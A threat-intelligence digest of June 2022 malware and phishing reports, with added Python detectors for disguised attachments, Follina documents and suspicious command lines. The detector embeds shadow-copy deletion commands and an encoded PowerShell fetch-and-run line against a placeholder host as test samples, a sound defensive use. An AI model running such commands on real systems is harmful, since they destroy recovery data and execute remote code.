Lockbit Ransomware Disguised as Copyright Claim E-mail Being Distributed

(published: June 24, 2022)

Background:

ASEC researchers have released their analysis of a recent phishing campaign, active since February 2022.

The campaign aims to infect users with Lockbit ransomware, using a copyright claim as the phishing lure. The email directs the recipient to open an attached zip file that supposedly contains a PDF of the infringed material. In reality, the "PDF" is an NSIS executable with a disguised name and icon, which downloads and installs Lockbit.
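The disguise described above relies on the recipient trusting the file name. A mail gateway or analyst can instead compare each archive member's claimed extension with its leading magic bytes: a real PDF starts with `%PDF`, while an NSIS installer is a Windows PE and starts with `MZ`. The following Python is an added example, not code from ASEC or from the campaign; the zip it inspects is constructed inline and the member names are invented.

```python
import io
import zipfile
from typing import Dict, List

# Magic bytes for the two formats at issue here: a genuine PDF and a Windows
# PE (an NSIS installer is a PE). Anything else is reported as "unknown".
MAGIC = {
    b"%PDF": "pdf",
    b"MZ": "exe",
}

# Extensions under which a PE may legitimately appear; a PE claiming any
# other extension (for example .pdf) is treated as disguised.
EXEC_EXTS = {"exe", "scr", "com", "dll", "pif"}


def sniff(head: bytes) -> str:
    """Return the file type implied by the leading bytes, or 'unknown'."""
    for prefix, kind in MAGIC.items():
        if head.startswith(prefix):
            return kind
    return "unknown"


def claimed_type(name: str) -> str:
    """Return the type the file name claims via its final extension."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def triage_zip(blob: bytes) -> List[Dict]:
    """Compare each zip member's claimed extension against its magic bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(8)
            actual = sniff(head)
            claimed = claimed_type(info.filename)
            findings.append({
                "name": info.filename,
                "claimed": claimed,
                "actual": actual,
                # A member that claims to be a document but starts with MZ is
                # the pattern of the Lockbit lure described in the text.
                "suspicious": actual == "exe" and claimed not in EXEC_EXTS,
            })
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample, not the real attachment: one PDF stub and one PE
    stub that has been renamed to .pdf."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notice.pdf", b"%PDF-1.4\n%stub\n")
        zf.writestr("copyright_claim.pdf", b"MZ\x90\x00" + b"\x00" * 60)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_zip()):
        print(finding)
```

Reading only the first few bytes keeps the check cheap enough to run on every attachment; a hit on a PE under a document extension is a strong enough signal to quarantine the message rather than merely warn the user.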

The ransomware is placed on the desktop and set up to persist across a desktop change or reboot. Before encrypting data, Lockbit deletes volume shadow copies to hinder recovery and terminates a range of services and processes so that they neither block encryption nor detect it.

Takeaway:

Never open attachments or run executables from suspicious emails. Copyright infringement notices are a common phishing lure; a legitimate claim is straightforward to verify through the rights holder's official channels and does not depend on opening an attachment. Any copyright email that pressures you to open an attached file should be treated with extreme caution.

There is More Than One Way To Sleep: Deep Dive into the Implementations of API Hammering by Various Malware Families

(published: June 24, 2022)

Background:

Researchers at Palo Alto Networks have released their analysis of new BazarLoader and Zloader samples that utilize API Hammering as a technique to evade sandbox detection.

API Hammering makes use of a large volume of Windows API calls to delay the execution of malicious activity to trick sandboxes into thinking the malware is benign.

Whilst BazarLoader has used the technique before, this new variant builds its large loops of benign API calls by a new method. The calls operate on registry keys whose names are stored encoded within the malware, and the loop count is derived from the offset of the first null byte in the first file of the System32 directory, which yields a very large number on a real host.

Zloader uses a different form of API Hammering to evade sandbox detection. Hardcoded within Zloader are four large functions, each containing many smaller functions, and each of these makes an input/output (I/O) call to mimic the behavior of legitimate processes.

Takeaway:

Defense in depth is the best defense against sophisticated malware.

Malware Analysis Report (AR22-174A)

(published: June 23, 2022)

Background:

The Cybersecurity and Infrastructure Security Agency (CISA) has released a new malware analysis report on a malicious build of the XMRig cryptominer that functions as a remote access trojan (RAT). The loader is decrypted only at run time and executes entirely in memory. The RAT receives its C2 instructions from a hardcoded IP address, always on port 443. Its functionality includes data exfiltration, desktop monitoring, keylogging, lateral movement and reverse shell access.

Takeaway:

The report includes malware signatures; an up-to-date antivirus solution that consumes such signatures is a critical component of a defense in depth policy.

CVE-2022-31749: WatchGuard Authenticated Arbitrary File Read/Write (Fixed)

(published: June 23, 2022)

Background:

Researchers at Rapid7 have reported that, as of 23 June, a patch is available for a vulnerability they discovered, tracked as CVE-2022-31749.

The vulnerability allows a low-privilege authenticated user of a WatchGuard Firebox or XTM appliance to read and write arbitrary system files via argument injection in the SSH command-line interface.

The diagnose and import pac commands pass user-supplied arguments through to the underlying ftpput and ftpget utilities, so additional arguments can be injected and the credential checks bypassed. Whilst it is still unconfirmed whether remote code execution (RCE) is possible, proof-of-concept exploitation has shown that the configd-hash.xml file, which contains user password hashes, can be exfiltrated.

Takeaway:

A patch management policy ensures that critical systems and vulnerabilities are patched in a timely manner with minimal downtime. Always change default passwords: they are weak, and if their hashes are stolen they can be cracked into usable passwords quickly.

Chinese Actor Takes Aim, Armed with Nim Language and Bizarro AES

(published: June 22, 2022)

Background:

Check Point researchers have identified a campaign by a Chinese-speaking actor that is likely closely linked to the threat actor Tropic Trooper (PIRATE PANDA, APT23). Whilst the group's initial infection vector is unknown, the dropper used after infection in this campaign is written in Nim and performs two actions.

The first is to download a Chinese-language app named SMS Bomber, a tool for flooding a target phone with SMS messages. The second is to inject shellcode into a notepad.exe process, so the SMS Bomber delivered by the dropper is effectively a trojanized app. The shellcode contacts an obfuscated IP address before downloading the Yahoyah trojan and the TClient backdoor, both previously used by Tropic Trooper.

To disrupt analysis, strings that would normally be encrypted with AES are instead encrypted with a variant in which the sequence of AES operations is inverted, so a stock AES implementation does not recover them and deobfuscation takes researchers longer.

Takeaway:

A defense in depth approach to security is the best defense against APT groups.


Avos Ransomware Group Expands with New Attack Arsenal

(published: June 21, 2022)

Background:

Cisco Talos researchers have documented the recent activity of Avos, a threat actor who is typically involved in Ransomware as a Service (RaaS) activities.

The threat actor's ransomware of choice is AvosLocker. Whilst spam campaigns are often the initial infection vector, from late 2021 onward Avos has also been seen exploiting Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832) to gain access.

Once the threat actors have access to a victim's machine, an encoded PowerShell script is used to download AvosLocker. As of the publication date, Avos continues to operate under a RaaS model.
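Two of the behaviors in this digest surface in process-creation telemetry: the shadow-copy deletion Lockbit performs before encrypting (covered in the Lockbit item above) and the encoded PowerShell download that stages AvosLocker. Because `-EncodedCommand` hides the script as base64 of UTF-16LE text, a detection that only matches the visible command line misses it. The following Python is an added example, not code from Cisco Talos, ASEC or any vendor product: it decodes encoded PowerShell, then runs both checks over the combined text. The sample command lines are constructed, and the regexes are illustrative rather than a complete catalogue.

```python
import base64
import re
from typing import Dict, List, Optional

# Illustrative patterns only. Shadow-copy deletion covers vssadmin, wmic and
# the WMI class used from PowerShell; the cradle list covers common download
# primitives seen in staging scripts.
RULES = {
    "shadow_copy_deletion": re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows"
        r"|wmic(\.exe)?\s+shadowcopy\s+delete"
        r"|Win32_ShadowCopy",
        re.IGNORECASE,
    ),
    "powershell_download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"
        r"|\bcurl\b|Start-BitsTransfer",
        re.IGNORECASE,
    ),
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if absent.
    The value is base64 of the script encoded as UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> Dict:
    """Run every rule over the command line plus its decoded payload."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else f"{cmdline}\n{decoded}"
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    return {"cmdline": cmdline, "decoded": decoded, "hits": hits}


def encode_for_powershell(script: str) -> str:
    """Produce the same encoding PowerShell expects, used only to build samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry); the host name is invented.
SAMPLE_CMDLINES: List[str] = [
    "vssadmin.exe delete shadows /all /quiet",
    "powershell.exe -nop -w hidden -enc " + encode_for_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
    ),
    "powershell.exe -enc " + encode_for_powershell(
        "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"
    ),
    "notepad.exe C:\\Users\\alice\\notes.txt",
]


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = triage(line)
        print(result["hits"], "<-", line[:60])
```

The third sample is the point of decoding first: nothing in the visible command line mentions shadow copies, yet the decoded script deletes them through WMI, so a rule applied only to the raw command line would stay silent.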

Takeaway:

Critical vulnerabilities should be patched at the earliest possible opportunity to reduce the risk of exploitation. A patch management process should facilitate and oversee patch deployment to minimize downtime for vulnerable systems.

Unveiling an Unknown APT Actor Attacking High-Profile Entities in Europe and Asia

(published: June 21, 2022)

Background:

Kaspersky researchers have released their analysis of a new APT group dubbed ToddyCat.

Active since December 2020, ToddyCat has been linked to multiple campaigns exploiting ProxyLogon (CVE-2021-26855) to compromise Microsoft Exchange servers initially in Taiwan and Vietnam.

New countries they have targeted include Afghanistan, India, Indonesia, Iran, Kyrgyzstan, Malaysia, Pakistan, Russia, Slovakia, Thailand, United Kingdom and Uzbekistan.

Additionally, ToddyCat uses two custom tools: a backdoor named Samurai and a trojan named Ninja. Samurai is a sophisticated backdoor that operates on ports 80 and 443 and allows for the deployment of additional malware (mostly Ninja) and for lateral movement.

Samurai features anti-analysis functionality: it is heavily encrypted and uses convoluted switch-case constructs to obscure its control flow. Ninja is a powerful trojan whose functionality includes file system management, process enumeration, multiple concurrent reverse shell sessions and arbitrary code injection.

Takeaway:

Patch management policies should be enforced to ensure that critical vulnerabilities are patched as soon as possible.

Russia’s APT28 Uses Fear of Nuclear War to Spread Follina Docs in Ukraine

(published: June 21, 2022)

Background:

Malwarebytes researchers have documented a new campaign by the Russian state-sponsored threat actor APT28 (Fancy Bear) that uses Follina (CVE-2022-30190), a remote code execution vulnerability in the Microsoft Support Diagnostic Tool (MSDT), to steal information.

Phishing emails were distributed carrying a Microsoft Word document whose text was copied from an Atlantic Council article. The document's document.xml.rels relationships part points to an external HTML file; when retrieved, that file triggers MSDT to run an encoded PowerShell script. The script installs a custom stealer that targets usernames, passwords and URLs in Chrome and Edge and cookie data in Firefox. Stolen data is exfiltrated to a C2 domain over IMAP.
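The first hop of the chain just described is visible without opening the document in Word: a .docx is a zip, and the Follina relationship is an oleObject entry in `word/_rels/document.xml.rels` whose `TargetMode` is `External` and whose `Target` is an HTTP URL. The following Python is an added example, not code from Malwarebytes or from the APT28 document: it scans a package for that relationship, and separately checks fetched HTML for the `ms-msdt:` URI scheme that CVE-2022-30190 abuses. The package it scans is constructed inline, and the target URL is invented.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
)
STYLES_TYPE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
)


def scan_docx(blob: bytes) -> List[Dict]:
    """Flag oleObject relationships whose target lies outside the package.
    An embedded OLE object normally lives in word/embeddings/; one fetched
    from a remote URL on open is the Follina delivery pattern."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                external = rel.get("TargetMode", "Internal") == "External"
                if external and rel.get("Type") == OLE_TYPE:
                    findings.append({
                        "part": name,
                        "id": rel.get("Id"),
                        "target": rel.get("Target", ""),
                    })
    return findings


def html_invokes_msdt(html: str) -> bool:
    """Second stage: the retrieved HTML hands an ms-msdt: URI to the
    protocol handler, which is what CVE-2022-30190 exploits."""
    return "ms-msdt:" in html.lower()


def build_sample_docx(target: str, external: bool = True) -> bytes:
    """Constructed minimal package (not the campaign document): only the
    relationships part the scanner reads plus a stub document body."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{OLE_TYPE}" Target="{target}"{mode}/>'
        f'<Relationship Id="rId2" Type="{STYLES_TYPE}" Target="styles.xml"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<document/>")  # stub, never parsed
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Trailing "!" on the URL mirrors the form seen in published Follina samples.
    malicious = build_sample_docx("http://example.invalid/page.html!")
    print(scan_docx(malicious))
    benign = build_sample_docx("embeddings/oleObject1.bin", external=False)
    print(scan_docx(benign))
    # Constructed HTML stub standing in for the fetched second stage.
    print(html_invokes_msdt('<script>location.href="ms-msdt:/id PCWDiagnostic"</script>'))
```

Scanning every `.rels` part rather than only `document.xml.rels` costs nothing and also covers headers, footers and other parts that can carry relationships of their own.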

Takeaway:

Never open documents from suspicious emails. Fear is a common tactic for pressuring victims into a hasty decision, so any attempt to frighten you into opening an attachment should be treated with a high degree of caution.

Client-Side Magecart Attacks Still Around, but More Covert

(published: June 20, 2022)

Background:

Malwarebytes researchers have detected a new wave of Magecart skimmers, active since November 2021. These still run client side, but with additional tradecraft. Variable names, once plain text that described the data they held, are now obfuscated to make analysis more difficult. Additionally, the skimmers check whether they are running in a virtual machine and stop executing if they detect a sandbox.

Takeaway:

Ensure endpoint security is up to date and security patches are installed in a timely manner to minimize the risk of skimmer injection. Monitor network traffic for anomalous behavior to detect possible C2 activity.

Microsoft 365 Credentials Targeted in New Fake Voicemail Campaign

(published: June 20, 2022)

Background:

Zscaler researchers have discovered a new phishing campaign targeting organizations within the US, specifically in the healthcare, manufacturing, military and security software industries.

The emails are routed through Japanese email services and spoof the targeted organization as the sender. Each phishing email carries an HTML attachment dressed up with a musical note so that it passes for a voice note. When opened, JavaScript embedded in the file redirects the victim to a phishing site that presents a CAPTCHA to feign legitimacy. A fake Microsoft login portal then follows and steals any credentials entered.

Takeaway:

Never open attachments from suspicious emails. Education is the best defense against phishing. Always check that the domain and URL are correct before entering any private or personal information. If you are already logged in and are asked to log in again, treat that as a possible indicator that the website is illegitimate.
